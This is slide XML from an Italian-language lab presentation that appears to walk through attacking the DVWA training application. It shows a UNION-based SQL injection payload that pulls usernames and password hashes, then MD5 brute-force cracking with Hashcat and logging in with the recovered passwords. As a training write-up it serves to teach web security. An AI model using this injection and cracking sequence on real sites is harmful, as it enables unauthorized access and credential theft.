        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7034"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5862">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5862">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.Prove di inserimento variabili &amp; Verifica degli eventuali risultati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677550" y="2039147"/>
            <a:ext cx="5664459" cy="5588933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5588933" w="5664459">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5664459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664459" y="5588933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5588933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-9687710" y="-762893"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526836" y="16781946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="624442" y="576263"/>
            <a:ext cx="6878853" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7034"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5862">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5862">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.Risultati &amp; Hashcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="448378" y="2811780"/>
            <a:ext cx="7778839" cy="46062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Infine, recuperiamo le password dalla tabella users con la query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>1’ UNION SELECT first_name, password FROM users#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>che ci restituirà tutte le password associate al parametro first_name della tabella. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Le password sono salvate all’interno del DB in formato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, un codice esadecimale usato per cifrare le password degli utenti in maniera sicura. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Vediamo come poterle ripristinare in chiaro con un tool chiamato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a: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5494912" y="4777172"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="4222327" y="-112019"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120019" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="3026354" y="7764591"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10644161" y="896456"/>
            <a:ext cx="4883698" cy="970470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="970470" w="4883698">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4883698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4883698" y="970470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="970470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="-27253" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10644161" y="2431590"/>
            <a:ext cx="7123006" cy="4324253"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4324253" w="7123006">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7123007" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7123007" y="4324254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4324254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10644161" y="7096376"/>
            <a:ext cx="6020625" cy="309885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="309885" w="6020625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6020625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020625" y="309885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="309885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-27176" b="-107138"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10644161" y="7764591"/>
            <a:ext cx="6020625" cy="354062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="354062" w="6020625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6020625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020625" y="354061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="354061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="-1577" t="-5903" r="-74289" b="-105903"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10644161" y="8528215"/>
            <a:ext cx="6020625" cy="465100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="465100" w="6020625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6020625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020625" y="465101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="465101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-20416"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="437673" y="2603212"/>
            <a:ext cx="7778839" cy="167259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Roboto Condensed"/>
              </a:rPr>
              <a:t>Abbiamo deciso di hackerare le password in modo da visualizzarle in chiaro; per fare ciò abbiamo utilizzato un Tool di Kali Linux per effettuare questa operazione, in questo caso utilizzando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="437673" y="4806126"/>
            <a:ext cx="7778839" cy="41871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Da terminale abbiamo inserito il comando hashcat per richiamare il Tool; di seguito il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>-m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> che richiama il tipo di codifica da decifrare (in questo caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>m 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>  equivalente alla codifica MD5) e abbiamo impostato il tipo di attacco con lo switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> e il numero 3, che indica un attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>nfine abbiamo selezionato il file txt in cui abbiamo salvato la lista di password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Hashcat ci riporta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>quattro password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>perché la numero 1 e la numero 5 sono identiche.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5494912" y="4777172"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="4222327" y="-112019"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120019" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="3026354" y="7764591"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10584314" y="852786"/>
            <a:ext cx="4614212" cy="3615153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3615153" w="4614212">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4614212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4614212" y="3615152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3615152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10463205" y="5143500"/>
            <a:ext cx="5423219" cy="4419591"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4419591" w="5423219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5423220" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5423220" y="4419591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4419591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="437673" y="2603212"/>
            <a:ext cx="7778839" cy="12534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Ricavate le password in chiaro, abbiamo provato ad effettuare un Login sulla pagina della DVWA in abbinamento con gli user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
